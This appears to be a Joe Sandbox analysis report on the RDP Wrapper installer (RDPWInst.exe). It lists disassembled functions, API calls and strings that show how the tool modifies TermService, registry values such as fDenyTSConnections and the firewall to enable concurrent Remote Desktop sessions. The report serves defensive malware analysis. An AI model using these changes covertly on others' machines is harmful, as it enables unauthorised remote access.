                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: - By using all or any portion of this software, you are agreeing$ - If you do not agree to any terms of the license agreement,$ - To read the license agreement, run the installer with -l parameter.$ do not use the software.$ only >= 6.0 (Vista, Server 2008 and newer) are supported.$ to be bound by all the terms and conditions of the license agreement.$$sD$%ProgramFiles%\RDP Wrapper\rdpwrap.dll$%SystemRoot%\system32\rdpwrap.dll$-i install wrapper to Program Files folder (default)$-i -o online install mode (loads latest INI file)$-i -s install wrapper to System32 folder$-l display the license agreement$-r force restart Terminal Services$-u uninstall wrapper$-u -k uninstall wrapper and keep settings$-w get latest update for INI file$Copyright (C) Stas'M Corp. 2017$Installer v2.5$LpD$RDP Wrapper Library v1.6.2$RDPWInst.exe [-l|-i[-s][-o]|-w|-u[-k]|-r]$SeDebugPrivilege$TermService$USAGE:$[*] Checking dependencies...$[*] Checking for updates...$[*] Configuring firewall...$[*] Configuring registry...$[*] Configuring service library...$[*] Extracting files...$[*] Installing...$[*] Notice to user:$[*] RDP Wrapper Library is already installed.$[*] RDP Wrapper Library is not installed.$[*] Removing files...$[*] Resetting service library...$[*] Restarting...$[*] Terminating service...$[*] Uninstalling...$[+] Done.$[+] Successfully installed.$[+] Successfully uninstalled.$[-] Unsupported Windows version:$[-] Unsupported processor architecture.$license
                                                                                                              • API String ID: 0-551293883
                                                                                                              • Opcode ID: 7cbbb260217d7fc7a01644a9b38dd862e028c17ba3129eca6f49844f2851695a
                                                                                                              • Instruction ID: 3b3904e08207714e519852b142ec2c0d1fdd34891fa1322cb905310c24a2fa21
                                                                                                              • Opcode Fuzzy Hash: 7cbbb260217d7fc7a01644a9b38dd862e028c17ba3129eca6f49844f2851695a
                                                                                                              • Instruction Fuzzy Hash: D60208A4B091404BEB00BBFB894324EA5519FC574CF92817FB604B72D7CA3CA8156A7F
                                                                                                              Function 0043E864 Relevance: 34.8, APIs: 7, Strings: 16, Instructions: 305COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 480 43e864-43e877 481 43e879-43e88d call 4387ec 480->481 482 43e88f-43e89b call 4387a8 480->482 487 43e89e-43e8bc call 438890 call 4389d8 481->487 482->487 492 43e8fa-43e95f call 4396b8 call 438860 487->492 493 43e8be-43e8f5 GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 487->493 504 43ed53-43ed61 call 40518c 492->504 505 43e965-43e976 call 4389d8 492->505 493->492 513 43e9b4-43ea21 call 4396b8 call 438860 call 4389d8 505->513 514 43e978-43e9af GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 505->514 533 43ea23-43ea5a GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 513->533 534 43ea5f-43eac3 call 4396b8 call 438860 call 439d1c 513->534 514->513 533->534 550 43eac8-43eaca 534->550 550->504 552 43ead0-43eae1 call 4389d8 550->552 558 43eae3-43eb1a GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 552->558 559 43eb1f-43eb38 call 438860 call 4389d8 552->559 558->559 569 43eb76-43ebf8 call 4392f0 call 439674 call 438860 call 4389d8 559->569 570 43eb3a-43eb71 GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 559->570 596 43ec36-43ecb8 call 4392f0 call 439674 call 438860 call 4389d8 569->596 597 43ebfa-43ec31 GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 569->597 570->569 618 43ecf6-43ed4e call 439674 call 438860 596->618 619 43ecba-43ecf1 GetLastError call 407450 call 407dec call 407450 call 404cdc call 4042f8 call 40632c 596->619 597->596 618->504 619->618
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(?,?,00447324), ref: 0043E8BE
                                                                                                              • GetLastError.KERNEL32(?,?,00447324), ref: 0043E978
                                                                                                              • GetLastError.KERNEL32(?,?,00447324), ref: 0043EA23
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast
                                                                                                              • String ID: $sD$AllowMultipleTSSessions$EnableConcurrentSessions$Name$RDPClip$RDPDND$Type$[-] OpenKey error (code $\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon$\SYSTEM\CurrentControlSet\Control\Terminal Server$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Clip Redirector$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\DND Redirector$\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VC$\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core$fDenyTSConnections
                                                                                                              • API String ID: 1452528299-1114397459
                                                                                                              • Opcode ID: 22b9b6838edb48365cdfb4778b466381cbf59e10845c44ab03fa5598231b4397
                                                                                                              • Instruction ID: d5bff1feb4e6776106dd90f858afd21f9f4463beb35b4115f94bb768dd44f540
                                                                                                              • Opcode Fuzzy Hash: 22b9b6838edb48365cdfb4778b466381cbf59e10845c44ab03fa5598231b4397
                                                                                                              • Instruction Fuzzy Hash: 97A16E70B052005BEB10BBBB984256E76A5DB8D308F51A47FF400A76D2CB3DAC05972E
                                                                                                              Function 00408F6C Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 156registrystringCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1050 408f6c-408f95 call 406bd8 1053 408f97-408faa GetModuleFileNameW 1050->1053 1054 408fac-408fc1 call 406c7c lstrcpynW 1050->1054 1055 408fc6-408fce 1053->1055 1054->1055 1058 408fd4-408ff5 RegOpenKeyExW 1055->1058 1059 40913b-409150 call 406be0 1055->1059 1061 409055-40908f call 408d70 RegQueryValueExW 1058->1061 1062 408ff7-409013 RegOpenKeyExW 1058->1062 1069 409091-4090c2 call 4041b0 RegQueryValueExW call 406d9c 1061->1069 1070 4090c4-4090de RegQueryValueExW 1061->1070 1062->1061 1063 409015-409031 RegOpenKeyExW 1062->1063 1063->1061 1066 409033-40904f RegOpenKeyExW 1063->1066 1066->1059 1066->1061 1072 40910f-409120 1069->1072 1071 4090e0-40910a call 4041b0 RegQueryValueExW call 406d9c 1070->1071 1070->1072 1071->1072 1077 409122-409125 call 4041cc 1072->1077 1078 40912a-409133 RegCloseKey 1072->1078 1077->1078
                                                                                                              APIs
                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,00409151,?,00000000), ref: 00408FA5
                                                                                                              • lstrcpynW.KERNEL32(?,00000000,00000105,00000000,00409151,?,00000000), ref: 00408FC1
                                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000,00000105,00000000,00409151,?,00000000), ref: 00408FEE
                                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000,00000105,00000000,00409151), ref: 0040900C
                                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?), ref: 0040902A
                                                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 00409048
                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,?,00000000), ref: 00409088
                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001), ref: 004090B3
                                                                                                              • RegQueryValueExW.ADVAPI32(?,00409208,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001), ref: 004090D7
                                                                                                              • RegQueryValueExW.ADVAPI32(?,00409208,00000000,00000000,?,?,?,00409208,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 00409100
                                                                                                              • RegCloseKey.ADVAPI32(?,0040913B,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,00409134,?,80000001,Software\CodeGear\Locales), ref: 0040912E
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: OpenQueryValue$CloseFileModuleNamelstrcpyn
                                                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales
                                                                                                              • API String ID: 3482678030-345420546
                                                                                                              • Opcode ID: b86ae2d81a9e05b6b7bf3f0ce843eb1dbeb4dae58668f089461cbe54660652d9
                                                                                                              • Instruction ID: 299ddb9754ebd29522f96ae12af661ce277d6f97d31c05324fadffe1222b4d16
                                                                                                              • Opcode Fuzzy Hash: b86ae2d81a9e05b6b7bf3f0ce843eb1dbeb4dae58668f089461cbe54660652d9
                                                                                                              • Instruction Fuzzy Hash: CA510071B40209BEEB10EAA5CD46FAE77BCEB48704F504477B604F61C2D6B8AE408A5D
                                                                                                              Function 0043A7BC Relevance: 24.2, APIs: 2, Strings: 14, Instructions: 181COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(00000000,0043AA55,?,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443A16,00000000,00443FB2), ref: 0043A827
                                                                                                              • GetLastError.KERNEL32(00000000,0043AA55,?,?,00447324,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00443A16,00000000,00443FB2), ref: 0043A91D
                                                                                                                • Part of subcall function 00438860: RegFlushKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 00438871
                                                                                                                • Part of subcall function 00438860: RegCloseKey.ADVAPI32(00010000,004375FC,004388B7,004375FC,00000001,004387C6,?,00447324,0043A802,00000000,0043AA55,?,?,00447324,00000000,00000000), ref: 0043887A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$CloseFlush
                                                                                                              • String ID: $sD$ImagePath$ServiceDll$[*] ImagePath: "$[*] ServiceDll: "$[-] Another third-party TermService library is installed.$[-] OpenKeyReadOnly error (code $[-] TermService is hosted in a custom application (BeTwin, etc.) - unsupported.$\SYSTEM\CurrentControlSet\Services\TermService$\SYSTEM\CurrentControlSet\Services\TermService\Parameters$rdpwrap.dll$svchost -k$svchost.exe$termsrv.dll
                                                                                                              • API String ID: 1149308822-2563127478
                                                                                                              • Opcode ID: 3e349bb9003ee561f3f41bf2c4cd298ce689c8a6cca98ee662a00d79e13e63ec
                                                                                                              • Instruction ID: 1ac512ede3db6dba28468dccd327cdb8adfd53dd4df03d49c6afb8088628474e
                                                                                                              • Opcode Fuzzy Hash: 3e349bb9003ee561f3f41bf2c4cd298ce689c8a6cca98ee662a00d79e13e63ec
                                                                                                              • Instruction Fuzzy Hash: 01515774B442005BD700FBBA8D4255EB2659F8930CB51A43FB840BB796CB3CEC158AAF
                                                                                                              Function 00408C28 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 77stringCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • EnterCriticalSection.KERNEL32(00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000,00000105,00000000,004095BB), ref: 00408C46
                                                                                                              • LeaveCriticalSection.KERNEL32(00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000,00000105,00000000), ref: 00408C6A
                                                                                                              • LeaveCriticalSection.KERNEL32(00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000,00000105,00000000), ref: 00408C79
                                                                                                              • IsValidLocale.KERNEL32(00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?,00000000), ref: 00408C8D
                                                                                                              • EnterCriticalSection.KERNEL32(00449B54,00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540,?,?,?), ref: 00408CEA
                                                                                                              • lstrcpynW.KERNEL32(en-GB,en,en-US,,00000000,000000AA,00449B54,00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000,?,00409540), ref: 00408D08
                                                                                                              • LeaveCriticalSection.KERNEL32(00449B54,en-GB,en,en-US,,00000000,000000AA,00449B54,00000000,00000002,00449B54,00449B54,00000000,00408D2D,?,?,00000000,00000000), ref: 00408D12
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$Leave$Enter$LocaleValidlstrcpyn
                                                                                                              • String ID: en-GB,en,en-US,
                                                                                                              • API String ID: 1058953229-3021119265
                                                                                                              • Opcode ID: f5c0c5a953935993f8144897554dda3b04a66e7f6cf498fae83c5be40df86a5b
                                                                                                              • Instruction ID: 9b1ce77b3c0781b783b438d4c88a1dd796634ce3a4aca31124bb85a30b48e6d3
                                                                                                              • Opcode Fuzzy Hash: f5c0c5a953935993f8144897554dda3b04a66e7f6cf498fae83c5be40df86a5b
                                                                                                              • Instruction Fuzzy Hash: B321AE203042556AEB50B77A9E57B6A2169EF4570CF60443FB481B72D2CEBCAC04E22E
                                                                                                              Function 0043C1C8 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 53COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,00001DD4,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1CF
                                                                                                              • GetLastError.KERNEL32(00000001,00000000,00001DD4,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000,00000000), ref: 0043C1DA
                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000,00000001,00000000,00001DD4,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008,00000000), ref: 0043C219
                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001DD4,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C223
                                                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001DD4,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C228
                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,00000000,00001DD4,?,00447324,00443F30,00000000,00443FB2,?,?,?,?,00000008), ref: 0043C265
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseErrorHandleLastProcess$OpenTerminate
                                                                                                              • String ID: $sD$[-] OpenProcess error (code $[-] TerminateProcess error (code
                                                                                                              • API String ID: 1809907545-775158141
                                                                                                              • Opcode ID: 6f554e20b072eb6f5660c25ac1f2be49616fb729524d0b6480b7b10d1be33d93
                                                                                                              • Instruction ID: c032a40b630c9990863936c46c82d74717666648ea03c3b6a4bb658b84b7f9ba
                                                                                                              • Opcode Fuzzy Hash: 6f554e20b072eb6f5660c25ac1f2be49616fb729524d0b6480b7b10d1be33d93
                                                                                                              • Instruction Fuzzy Hash: EB01F6A5B442111AE610B3FB0D82B2F255A8F8A75CF02917FB504B62D7CA3C9C11977F
                                                                                                              Function 0040472C Relevance: 15.1, APIs: 10, Instructions: 129fileCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1434 40472c-404740 1435 404742-404743 1434->1435 1436 40474d-404763 1434->1436 1438 404765-404774 1435->1438 1439 404745-404746 1435->1439 1437 40478c-40479f 1436->1437 1443 4047a5-4047bd CreateFileW 1437->1443 1444 404857-404874 1437->1444 1442 404785 1438->1442 1440 404776-404780 1439->1440 1441 404748 1439->1441 1440->1442 1445 4048b5-4048b6 1441->1445 1442->1437 1448 4047c3-4047cb 1443->1448 1449 4048cb-4048d6 GetLastError 1443->1449 1446 404876-404878 1444->1446 1447 40487a-404880 1444->1447 1450 404888-404890 GetStdHandle 1446->1450 1451 404882-404884 1447->1451 1452 404886 1447->1452 1453 4047d1-4047df GetFileSize 1448->1453 1454 404894-40489a 1448->1454 1449->1445 1450->1449 1456 404892 1450->1456 1451->1450 1452->1450 1453->1449 1455 4047e5-4047ea 1453->1455 1457 4048b3 1454->1457 1458 40489c-4048a5 GetFileType 1454->1458 1459 4047ec 1455->1459 1460 4047ee-4047fb SetFilePointer 1455->1460 1456->1454 1457->1445 1461 4048b7-4048c9 CloseHandle 1458->1461 1462 4048a7-4048aa 1458->1462 1459->1460 1460->1449 1463 404801-40481d ReadFile 1460->1463 1461->1445 1462->1457 1464 4048ac 1462->1464 1463->1449 1465 404823 1463->1465 1464->1457 1466 404825-404827 1465->1466 1466->1454 1467 404829-404831 1466->1467 1468 404833-404834 1467->1468 1469 404836-404845 SetFilePointer 1467->1469 1468->1466 1469->1449 1470 40484b-404853 SetEndOfFile 1469->1470 1470->1449 1471 404855 1470->1471 1471->1454
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004047B5
                                                                                                              • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004047D9
                                                                                                              • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004047F5
                                                                                                              • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00404816
                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 0040483F
                                                                                                              • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 0040484D
                                                                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00404888
                                                                                                              • GetFileType.KERNEL32(?,000000F5), ref: 0040489E
                                                                                                              • CloseHandle.KERNEL32(?,?,000000F5), ref: 004048B9
                                                                                                              • GetLastError.KERNEL32(000000F5), ref: 004048D1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                              • String ID:
                                                                                                              • API String ID: 1694776339-0
                                                                                                              • Opcode ID: 88c077e9ec81b413e44c4e0d06344b1548c794062b539f639d5ca81acda773dd
                                                                                                              • Instruction ID: de0dc4671a2c55deed7a27a48df34c8c3110be8be3acd5b577aa359944728292
                                                                                                              • Opcode Fuzzy Hash: 88c077e9ec81b413e44c4e0d06344b1548c794062b539f639d5ca81acda773dd
                                                                                                              • Instruction Fuzzy Hash: EA4183B5500A40A9E730BF24C90972376E4EBC0714F20CE3FE692B66D0E7BDA845878D
                                                                                                              Function 0043C31C Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 70processsynchronizationCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC,?,00447324), ref: 0043C37B
                                                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC,?,00447324), ref: 0043C384
                                                                                                              • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC,?,00447324), ref: 0043C3BB
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC), ref: 0043C3C6
                                                                                                              • CloseHandle.KERNEL32(?,?,000000FF,?,00000000,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000044,?,00000000,0043C3EC), ref: 0043C3CF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1440467853.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1440444167.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440566600.0000000000445000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440606976.0000000000446000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.0000000000447000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440645534.000000000044B000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440742466.000000000044D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1440770598.0000000000450000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_400000_RDPWInst.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseHandle$CreateErrorLastObjectProcessSingleWait
                                                                                                              • String ID: $sD$D$[-] CreateProcess error (code:
                                                                                                              • API String ID: 1377960556-1026335874
                                                                                                              • Opcode ID: 58e4cee0019deaf83b36aa1437f8aa0207d0818498334e5e25efdc6c94b6a7a4
                                                                                                              • Instruction ID: 1d017b2d671d3512e5dabab7732e068b99e5a835ee42228d460eb482b244bc14
                                                                                                              • Opcode Fuzzy Hash: 58e4cee0019deaf83b36aa1437f8aa0207d0818498334e5e25efdc6c94b6a7a4
                                                                                                              • Instruction Fuzzy Hash: D21151B0644204AADB00F7E5CD82F9E77B89F49714F61453BF610F61D2D67CA910972E
                                                                                                              Function 00403028 Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
